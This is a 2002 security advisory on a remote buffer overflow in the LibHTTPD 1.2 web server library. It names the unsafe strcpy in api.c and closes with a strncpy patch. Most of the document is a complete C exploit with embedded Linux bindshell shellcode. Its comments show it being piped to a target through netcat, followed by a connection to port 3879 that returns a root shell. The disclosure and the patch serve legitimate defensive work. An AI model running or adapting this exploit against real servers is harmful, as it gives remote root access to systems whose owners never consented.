======================================== INetCop Security Advisory #2002-0x82-003 ======================================== * Title: Remote Buffer Overflow vulnerability in Lib HTTPd. 0x01. Description LibHTTPD can be used to add basic web server capabilities to an application or embedded device. Detailed contents desire to reference lower part homepage. :-) If examine 'api.c' of library libhttpd.a source code, can find vulnerability. Can see httpdProcessRequest() in line:860 __ 860 void httpdProcessRequest(server) 861 httpd *server; 862 { 863 char dirName[HTTP_MAX_URL], ... 869 server->response.responseLength = 0; 870 strcpy(dirName, httpdRequestPath(server)); // here. -- Herewith, fatal vulnerability that can execute rootshell in remote happens. 0x02. Vulnerable Packages Vendor site: http://www.hughes.com.au/products/libhttpd/ libhttpd-1.2 -libhttpd-1.2.tar.gz +Linux +Other 0x03. Exploit This's exploit code that prove. Through remote attack, get 'root' competence. Use netcat for very easy exploit. To do simple explanation about exploit. Through POST, insert much &shellcode address. Put next nop,shellcode. (Port:3879 bindshell code) === 0x82-Remote.libhttpdxpl.c === /* ** ** Lib HTTPd Remote Buffer Overflow exploit ** by Xpl017Elz ** __ ** Testing exploit: ** ** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80 ** ** (Ctrl+c) ** punt! ** bash$ nc libhttphost 3879 ** uname ** Linux ** id ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon), ** 3(sys),4(adm),6(disk),10(wheel) ** exit ** bash$ ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. ** My World: http://x82.i21c.net ** */ #include <stdio.h> int main(/* args? */) { int shadd2r; char b1ndsh[] = /* 129byte bindshellcode */ "\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M" "\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E" "\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315" "\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u" "\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377" "\377\377/bin/sh"; //--- POST &shellcode ---// fprintf(stdout,"POST "); for(shadd2r=0;shadd2r<0x408;shadd2r+=4) {/* rEDhAT Default: 0x804e482, Debian Address? */ fprintf(stdout,"\202\344\004\b"); } fprintf(stdout,"\r\n"); //--- NOP,shellcode ---// for(shadd2r=0;shadd2r<0x3e8;shadd2r++) {/* SSSSSSSS...SSSSSSSSS;;; */ fprintf(stdout,"S"); } fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh); } === eof === 0x04. Patch === api.patch === --- api.c Sat Nov 9 20:06:30 2002 +++ api.patch.c Sat Nov 9 20:05:33 2002 @@ -867,7 +867,7 @@ httpContent *entry; server->response.responseLength = 0; - strcpy(dirName, httpdRequestPath(server)); + strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL); cp = rindex(dirName, '/'); if (cp == NULL) { === eof === P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y -- -- Get your free email from http://www.hackermail.com Powered by Outblaze